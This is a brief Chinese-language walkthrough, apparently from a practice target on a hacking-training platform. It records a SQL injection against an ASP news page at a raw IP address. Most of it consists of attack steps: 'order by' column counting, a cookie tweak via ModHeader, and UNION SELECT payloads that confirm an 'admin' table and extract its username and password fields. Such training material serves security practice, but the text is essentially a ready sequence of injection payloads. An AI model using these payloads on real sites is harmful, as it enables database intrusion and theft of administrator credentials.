https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb
http://59.63.200.79:8004/shownews.asp?id=171
测试后发现 http://59.63.200.79:8004/shownews.asp?id=171 order by 10 order by 10页面显示正常,但是当用orderby11时显示数据库错误
抓包发现存在cookice 用modheader
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin 所有的字段显示出来,说明存在admin
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin